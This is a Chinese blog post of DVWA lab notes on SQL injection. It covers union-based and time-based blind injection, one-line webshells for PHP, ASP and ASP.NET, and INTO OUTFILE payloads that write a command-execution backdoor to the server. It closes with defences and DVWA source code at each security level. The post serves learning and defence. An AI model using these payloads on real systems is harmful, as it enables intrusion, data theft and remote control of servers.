zoukankan      html  css  js  c++  java

  • sql注入分析

    输入 1:
    sql为:select * from users where id = 1;

    输入'测试:
    回显:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
    报错猜想,输入的'传到了sql里,又由于语法错误,所以报错。通过报错我们可以判断后台对'进行了处理,
    因此,这个地方存在sql注入点。

    1 or 1=1
    sql:select *from users where id = 1 or 1=1;
    因为or 1=1 永远为真,所以不仅将id=1的结果报出来,还会将表里所有的信息报出来。

    如果不行,说明是字符型
    输入1' or '1'='1 或1' or 1=1 -- (--后有空格)


    手工利用

    使用union,联合查询时列数需要和主查询列数一致

    确认主查询列数?

    order by

    order by 对查询结果排序,按照第x列进行排序,若第n列不存在,则说明小于n列,通过此方法判断有几列
    1’ order by 1#
    1’ order by 2#
    1’ order by 3#

    1' union select 1,2--
    1' and 1=2 (让前边的查询结果为空)union select database(),user()#

    查表名
    1' and exists(select * from aa)#得到报错信息,猜测
    1.手动尝试,比如admin,user,users
    2.brup suite抓包,暴力破解,挂字典

    查字段名,同理
    1' and exists(select yy from users)#

    猜完就可用
    1' and 1=2 union select first_name,password from users#

    一名话木马:
    php:<?php @eval($_POST['chopper']);?>
    asp:<%eval request("chopper")%>
    asp.net:<%@Page Language="Jscript"%><%Request.Item["chopper"],"unsafe;"%>

    菜刀可以对一句话木马进行连接和管理,一句话木马的控制台。

    上传一个后门,通过控制后门来得到shell
    <?system($_REQUEST['CMD'];)?> //通过request提交,执行shell


    1' and 1=2 union select 1,"<?system($_REQUEST['CMD']);?>" into outfile "d:\web\dvwa\zzz.php"
    或1' and 1=2 union select "<?","system($_REQUEST['CMD']);?>"into outfile "D:\xxxx\dvwa\zzz.php"
    生成一个文件,再去访问:http://192.168.0.3/web/dvwa/zzz.php?cmd=ipconfig 就能执行

    1' and 1=2 union select 1,"<?php eval($_POST['888']);?>"into outfile "D:\xxxx\dvwa\yyy.php"
    通过菜刀进行连接,就可控制后台服务器

    盲注:
    使用sleep来进行基于时间的判断
    1' and sleep(3)#

    firebug

    $num = @mysql_numrows( $result ); // The '@' character suppresses errors不会显示错误信息,对错误信息进行屏蔽

    防范措施:

    代码层面:
    1.对输入进行严格的转义和过滤
    2.使用参数化,将sql执行完再传参数,sql语句与参数分离

    网络层面:
    1.通过waf设备启用防sql inject注入策略
    2.云端防护(260网站卫士、阿里云盾等)

    源代码:
    低级:
    <?php

    if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
    }
    else {
    // User wasn't found, so the page wasn't!
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
    }

    ?>

    中级:
    <?php

    if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );// 对 ‘ “ 、 ,进行转义

    // Check database
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";  //数字型的,前端是个选项,通过burp抓包可以绕过


    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
    }
    else {
    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
    }

    ?>

    高级:
    <?php

    if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";   //可通过#注释符绕过
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
    }
    else {
    // Might sleep a random amount
    if( rand( 0, 5 ) == 3 ) {
    sleep( rand( 2, 4 ) );
    }

    // User wasn't found, so the page wasn't!
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
    }

    ?>

    最高:

    <?php

    if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );//有token,防止表、列名的拆解

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
    // Check the database
    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
    $data->bindParam( ':id', $id, PDO::PARAM_INT );  //先对语法进行预处理,再传参数,参数不会拼到sql,都只当作值来处理。
    $data->execute();

    // Get results
    if( $data->rowCount() == 1 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
    }
    else {
    // User wasn't found, so the page wasn't!
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
    }
    }
    }

    // Generate Anti-CSRF token
    generateSessionToken();

    ?>

  • 相关阅读:
    系统数据查询耗时优化解决方案
    Mybatis逆向工程
    微服务架构下的分布式数据管理
    分布式或微服务架构中的分布式锁应用
    word 常用宏代码
    office2003?2007共存?版本各自打开的解决方案
    word域3
    2014新版《安全生产法》测试题
    Excel与Word套打功能使用技巧及EXCEL数据处理成绩
    word域2
  • 原文地址:https://www.cnblogs.com/christychang/p/6047162.html
Copyright © 2011-2022 走看看